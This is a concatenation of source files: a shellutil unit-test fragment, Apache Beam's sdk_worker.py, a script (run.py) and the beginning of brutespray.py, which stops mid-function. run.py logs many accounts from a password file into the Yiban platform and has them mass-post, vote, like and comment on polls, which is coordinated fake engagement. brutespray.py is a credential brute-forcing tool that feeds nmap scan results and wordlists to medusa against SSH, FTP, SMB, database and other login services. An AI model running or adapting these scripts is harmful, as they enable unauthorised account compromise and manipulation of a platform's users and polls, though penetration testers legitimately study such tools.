# now fetch the PIDs in the files created by the commands, but wait until they are created
if not wait_for(lambda: all(os.path.exists(file) and os.path.getsize(file) > 0 for file in pid_files)):
raise Exception("The child processes did not start within the allowed timeout")
for sig_file in pid_files:
with open(sig_file, "r") as read_handle:
pids = read_handle.read().split()
child_processes.append(int(pids[0]))
parent_processes.append(int(pids[1]))
                # the first item in the PIDs we fetched corresponds to run_get_output, which invokes the command using the
                # shell, so in that case we need to use the parent's pid (i.e. the shell that we started)
started_commands = parent_processes[0:1] + child_processes[1:]
# wait for all the commands to start
def all_commands_running():
all_commands_running.running_commands = shellutil.get_running_commands()
return len(all_commands_running.running_commands) >= len(commands_to_execute) + 1 # +1 because run_pipe starts 2 commands
all_commands_running.running_commands = []
if not wait_for(all_commands_running):
self.fail("shellutil.get_running_commands() did not report the expected number of commands after the allowed timeout.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
started_commands.sort()
all_commands_running.running_commands.sort()
self.assertEqual(
started_commands,
all_commands_running.running_commands,
"shellutil.get_running_commands() did not return the expected commands.\nExpected: {0}\nGot: {1}".format(
format_processes(started_commands), format_processes(all_commands_running.running_commands)))
finally:
# terminate the child processes, since they are blocked
for pid in child_processes:
os.kill(pid, signal.SIGKILL)
# once the processes complete, their PIDs should go away
def no_commands_running():
no_commands_running.running_commands = shellutil.get_running_commands()
return len(no_commands_running.running_commands) == 0
no_commands_running.running_commands = []
if not wait_for(no_commands_running):
self.fail("shellutil.get_running_commands() should return empty after the commands complete. Got: {0}".format(
format_processes(no_commands_running.running_commands)))
finally:
for thread in threads:
thread.join(timeout=5)
if __name__ == '__main__':
unittest.main()
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials)
self._state_handler_factory = GrpcStateHandlerFactory(credentials)
self._profiler_factory = profiler_factory
self.workers = queue.Queue()
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._instruction_id_vs_worker = {}
self._fns = {}
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create workers
bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
for _ in range(self._worker_count):
      # SdkHarness manages function registration and shares self._fns with all
      # the workers. This is needed because function registration (register)
      # and execution (process_bundle) are sent over different requests and we
      # do not really know which worker is going to process the bundle for a
      # function until we get the process_bundle request. Moreover, the same
      # function is reused by different process_bundle calls and may be
      # executed by a different worker. Hence we need a centralized function
      # list shared among all the workers.
self.workers.put(
SdkWorker(bundle_processor_cache,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
        # Namespacing the request method with '_request_'. The called method
        # will be like self._request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
      # add the instruction_id vs worker map for progress reporting lookup
self._instruction_id_vs_worker[work.instruction_id] = worker
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Delete the instruction_id <-> worker mapping
self._instruction_id_vs_worker.pop(work.instruction_id, None)
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
logging.debug(
"Currently using %s threads." % len(self._process_thread_pool._threads))
def _request_process_bundle_split(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
if instruction_reference in self._instruction_id_vs_worker:
self._execute(
lambda: self._instruction_id_vs_worker[
instruction_reference
].do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
logging.warn('Unable to schedule instruction %s for %s',
instruction_id, scheduling_delay)
class BundleProcessorCache(object):
def __init__(self, state_handler_factory, data_channel_factory, fns):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
def register(self, bundle_descriptor):
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.cached_bundle_processors[descriptor_id].append(processor)
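# Editor's sketch (not part of the original module): the intended lifecycle of a
# cached bundle processor, as used by SdkWorker.process_bundle below. The helper
# is illustrative only and is never called.
def _bundle_processor_cache_lifecycle(cache, instruction_id, descriptor_id):
  processor = cache.get(instruction_id, descriptor_id)  # reuse a cached processor or build one
  try:
    # ... run processor.process_bundle(instruction_id) here ...
    cache.release(instruction_id)  # reset the processor and return it to the cache
  except Exception:
    cache.discard(instruction_id)  # never reuse a processor after a failure
    raise
  return processor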
class SdkWorker(object):
def __init__(self, bundle_processor_cache, profiler_factory=None):
self.bundle_processor_cache = bundle_processor_cache
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
      # E.g. if register is set, this will call self.register(request.register)
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_reference)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id):
with self.maybe_profile(instruction_id):
delayed_applications = bundle_processor.process_bundle(instruction_id)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos()))
# TODO(boyuanz): Don't release here if finalize is needed.
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def process_bundle_progress(self, request, instruction_id):
# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, credentials=None):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
logging.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
logging.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
  def blocking_get(self, state_key, instruction_reference):
    raise RuntimeError(
        'Unable to handle state requests for ProcessBundleDescriptor without '
        'a state ApiServiceDescriptor for instruction %s and state key %s.'
        % (instruction_reference, state_key))
  def blocking_append(self, state_key, data, instruction_reference):
    raise RuntimeError(
        'Unable to handle state requests for ProcessBundleDescriptor without '
        'a state ApiServiceDescriptor for instruction %s and state key %s.'
        % (instruction_reference, state_key))
  def blocking_clear(self, state_key, instruction_reference):
    raise RuntimeError(
        'Unable to handle state requests for ProcessBundleDescriptor without '
        'a state ApiServiceDescriptor for instruction %s and state key %s.'
        % (instruction_reference, state_key))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
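# Editor's sketch (not part of the original module): how _Future pairs with the
# response-reader thread in GrpcStateHandler._blocking_request. The requesting
# thread parks in wait()/get() until another thread calls set(). Illustrative
# only; never called by the harness.
def _future_usage_sketch():
  future = _Future()
  def _deliver():
    time.sleep(0.1)
    future.set('response payload')  # unblocks any thread waiting on the future
  threading.Thread(target=_deliver).start()
  while not future.wait(timeout=1):  # same polling loop as _blocking_request
    pass
  return future.get()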
|
run.py
|
import json
import queue
import threading
import time
import random
import ybapi.yblogin
from ybapi.ybvote import POETRY
from ybapi.yb import CONFIG_PATH
q = queue.Queue()
def read_passwd():
with open('passwd.txt', 'r') as f:
data = f.readlines()
for line in data:
            odom = line.split('|')
            # strip the trailing newline from the password field
            odom[1] = odom[1].replace('\n', '')
            account.append(odom[0])
            passwd.append(odom[1])
'''
Publish a vote
'''
def add_vote_task(account, passwd):
try:
yiban_user_token = ybapi.yblogin.getUserToken(account, passwd)
token = dict(yiban_user_token=yiban_user_token)
if token != None:
add_vote_result = ybapi.ybvote.vote(token, puid, group_id).add("你觉得哪首诗句好", "你觉得哪首诗句好",
POETRY[random.randint(0, 97)],
POETRY[random.randint(0, 97)])
if '操作成功' in add_vote_result['message']:
vote_id = add_vote_result['data']['lastInsetId']
q.put(vote_id)
print('{} 发布投票成功 | 目前有{}个队列任务'.format(account, q.qsize()))
except Exception as e:
with open('error.txt', 'a') as f:
f.write("发布投票出错" + str(e) + "\r\n")
'''
Main thread
'''
def run(id):
phone_it, password_it = iter(account), iter(passwd)
while True:
try:
p, p0 = next(phone_it), next(password_it)
add_vote_task(p, p0)
while not q.empty():
vote_id = q.get(block=False)
for i in range(len(account)):
try:
yiban_user_token = ybapi.yblogin.getUserToken(account[i], passwd[i])
token = dict(yiban_user_token=yiban_user_token)
if token != None:
ready_vote_result = ybapi.ybvote.go(token, puid, group_id, actor_id, vote_id, 0, 0).vote(
auto=True)
up_vote_result = ybapi.ybvote.go(token, puid, group_id, actor_id, vote_id, 0, 0).up()
reply_vote_result = ybapi.ybvote.go(token, puid, group_id, actor_id, vote_id, 0, 0).reply(
POETRY[random.randint(0, 96)])
print(
'[{}] {} 参与投票 {} 点赞投票 {} 评论投票 {} 当前任务ID {}'.format(id, account[i], ready_vote_result,
up_vote_result, reply_vote_result,
vote_id))
except Exception as e:
with open('error.txt', 'a') as f:
f.write("参与投票出错" + str(e) + "\r\n")
        except StopIteration:  # the account iterators are exhausted: re-create them and start over from the first account
phone_it, password_it = iter(account), iter(passwd)
if __name__ == '__main__':
account = []
passwd = []
read_passwd()
ybapi.yb.Init(CONFIG_PATH, account[0], passwd[0])
with open(CONFIG_PATH) as f:
config = json.loads(f.read())
try:
group_id = config['group_id']
puid = config['puid']
channel_id = config['channel_id']
actor_id = config['actor_id']
nick = config['nick']
except Exception as e:
print(e)
exit()
t1 = threading.Thread(target=run, args=("线程1 ",))
t2 = threading.Thread(target=run, args=("线程2 ",))
t3 = threading.Thread(target=run, args=("线程3 ",))
t1.start()
time.sleep(3)
t2.start()
time.sleep(0.5)
t3.start()
|
brutespray.py
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
from argparse import RawTextHelpFormatter
import readline, glob
import sys, time, os
import subprocess
import xml.etree.ElementTree as ET
import re
import argparse
import threading
import itertools
import tempfile
import shutil
import json
from multiprocessing import Process
services = {}
loading = False
class colors:
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
banner = colors.red + r"""
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
"""+'\n' \
+ r"""
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
"""+'\n' \
+ '\n brutespray.py v1.7.0' \
+ '\n Created by: Shane Young/@t1d3nio && Jacob Robles/@shellfail' \
+ '\n Inspired by: Leon Johnson/@sho-luv' \
+ '\n Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>\n' + colors.normal
#ascii art by: Cara Pearson
quiet_banner = colors.red + '~ BruteSpray ~' + colors.normal
class tabCompleter(object):
def pathCompleter(self,text,state):
line = readline.get_line_buffer().split()
return [x for x in glob.glob(text+'*')][state]
def interactive():
t = tabCompleter()
singluser = ""
if args.interactive is True:
print(colors.white + "\n\nWelcome to interactive mode!\n\n" + colors.normal)
print(colors.red + "WARNING:" + colors.white + " Leaving an option blank will leave it empty and refer to default\n\n" + colors.normal)
print("Available services to brute-force:")
for serv in services:
srv = serv
for prt in services[serv]:
iplist = services[serv][prt]
port = prt
plist = len(iplist)
print("Service: " + colors.green + str(serv) + colors.normal + " on port " + colors.red + str(port) + colors.normal + " with " + colors.red + str(plist) + colors.normal + " hosts")
args.service = input('\n' + colors.lightblue + 'Enter services you want to brute - default all (ssh,ftp,etc): ' + colors.red)
args.threads = input(colors.lightblue + 'Enter the number of parallel threads (default is 2): ' + colors.red)
args.hosts = input(colors.lightblue + 'Enter the number of parallel hosts to scan per service (default is 1): ' + colors.red)
if args.passlist is None or args.userlist is None:
customword = input(colors.lightblue + 'Would you like to specify a wordlist? (y/n): ' + colors.red)
if customword == "y":
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.pathCompleter)
if args.userlist is None and args.username is None:
args.userlist = input(colors.lightblue + 'Enter a userlist you would like to use: ' + colors.red)
if args.userlist == "":
args.userlist = None
if args.passlist is None and args.password is None:
args.passlist = input(colors.lightblue + 'Enter a passlist you would like to use: ' + colors.red)
if args.passlist == "":
args.passlist = None
if args.username is None or args.password is None:
            singluser = input(colors.lightblue + 'Would you like to specify a single username or password? (y/n): ' + colors.red)
if singluser == "y":
if args.username is None and args.userlist is None:
args.username = input(colors.lightblue + 'Enter a username: ' + colors.red)
if args.username == "":
args.username = None
if args.password is None and args.passlist is None:
args.password = input(colors.lightblue + 'Enter a password: ' + colors.red)
if args.password == "":
args.password = None
if args.username is None and args.userlist is None:
            combo = input(colors.lightblue + 'Would you like to use a combo list? (y/n): ' + colors.red)
if combo == "y":
args.combo = input(colors.lightblue + 'Enter a combolist you would like to use: ' + colors.red)
if args.combo == "":
args.combo = None
if args.service == "":
args.service = "all"
if args.threads == "":
args.threads = "2"
if args.hosts == "":
args.hosts = "1"
print(colors.normal)
NAME_MAP = {"ms-sql-s": "mssql",
"microsoft-ds": "smbnt",
"pcanywheredata": "pcanywhere",
"postgresql": "postgres",
"shell": "rsh",
"exec": "rexec",
"login": "rlogin",
"smtps": "smtp",
"submission": "smtp",
"imaps": "imap",
"pop3s": "pop3",
"iss-realsecure": "vmauthd",
"snmptrap": "snmp"}
def make_dic_gnmap():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
port = None
with open(args.file, 'r') as nmap_file:
for line in nmap_file:
for name in supported:
matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + name)
try:
port = matches.findall(line)[0]
except:
continue
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line)
tmp_ports = matches.findall(line)
for tmp_port in tmp_ports:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += ip
else:
services[name][tmp_port] = ip
else:
services[name] = {tmp_port:ip}
loading = True
def make_dic_xml():
global loading
global services
supported = ['ssh','ftp','postgresql','telnet','mysql','ms-sql-s','rsh',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp','smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
tree = ET.parse(args.file)
root = tree.getroot()
for host in root.iter('host'):
ipaddr = host.find('address').attrib['addr']
for port in host.iter('port'):
cstate = port.find('state').attrib['state']
if cstate == "open":
try:
name = port.find('service').attrib['name']
tmp_port = port.attrib['portid']
iplist = ipaddr.split(',')
except:
continue
if name in supported:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += iplist
else:
services[name][tmp_port] = iplist
else:
services[name] = {tmp_port:iplist}
loading = True
def make_dic_json():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
with open(args.file, "r") as jsonlines_file:
for line in jsonlines_file:
data = json.loads(line)
try:
host, port, name = data["host"], data["port"], data["service"]
if name in supported:
name = NAME_MAP.get(name, name)
if name not in services:
services[name] = {}
if port not in services[name]:
services[name][port] = []
if host not in services[name][port]:
services[name][port].append(host)
except KeyError as e:
sys.stderr.write("\n[!] Field: " + str(e) + "is missing")
sys.stderr.write("\n[!] Please provide the json fields. ")
continue
loading = True
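# Editor's illustration (hypothetical hosts, not part of the original script):
# each make_dic_* parser fills `services` with the shape
# service name -> port -> list of host IPs, which brute() later writes to a
# temp file for medusa's -H option.
def _example_services_dict():
    return {
        'ssh': {'22': ['10.0.0.5', '10.0.0.9']},
        'mysql': {'3306': ['10.0.0.7']},
    }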
def brute(service,port,fname,output,auserlist,ausername,apasslist,apassword,acontinuous,ahosts,athreads,averbose,acombo,adebug):
if auserlist is None and ausername is None and acombo is None:
userlist = '/usr/share/brutespray/wordlist/'+service+'/user'
if not os.path.exists(userlist):
userlist = 'wordlist/'+service+'/user'
uarg = '-U'
elif auserlist:
userlist = auserlist
uarg = '-U'
elif ausername:
userlist = ausername
uarg = '-u'
elif acombo:
userlist = acombo
uarg = '-C'
if apasslist is None and apassword is None and acombo is None:
passlist = '/usr/share/brutespray/wordlist/'+service+'/password'
if not os.path.exists(passlist):
passlist = 'wordlist/'+service+'/password'
parg = '-P'
elif apasslist:
passlist = apasslist
parg = '-P'
elif apassword:
passlist = apassword
parg = '-p'
elif acombo:
parg = ''
passlist = ''
if acontinuous:
cont = ''
else:
cont = '-F'
if service == "smtp":
aarg = "-m"
auth = "AUTH:LOGIN"
else:
aarg = ''
auth = ''
p = subprocess.Popen(['medusa', '-b', '-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', athreads, '-n', port, '-T', ahosts, cont, aarg, auth, '-v', averbose, '-w', adebug], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, bufsize=1)
out = "[" + colors.green + "+" + colors.normal + "] "
output_file = output + '/' + port + '-' + service + '-success.txt'
for line in p.stdout:
print(line.strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'SUCCESS' in line:
f = open(output_file, 'a')
f.write(out + line)
f.close()
def animate():
sys.stdout.write('\rStarting to brute, please make sure to use the right amount of ' + colors.green + 'threads(-t)' + colors.normal + ' and ' + colors.green + 'parallel hosts(-T)' + colors.normal + '... \n')
t_end = time.time() + 2
for c in itertools.cycle(['|', '/', '-', '\\']):
if not time.time() < t_end:
break
sys.stdout.write('\rOutput will be written to the folder: ./' + colors.green + args.output + colors.normal + "/ "+ c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\n\nBrute-Forcing... \n')
time.sleep(1)
def loading_animation():  # renamed: the original name "loading" shadowed the module-level loading flag polled below
for c in itertools.cycle(['|', '/', '-', '\\']):
if loading == True:
break
sys.stdout.write('\rLoading File: ' + c)
sys.stdout.flush()
time.sleep(0.01)
def getInput(filename):
in_format = None
with open(filename) as f:
line = f.readlines()
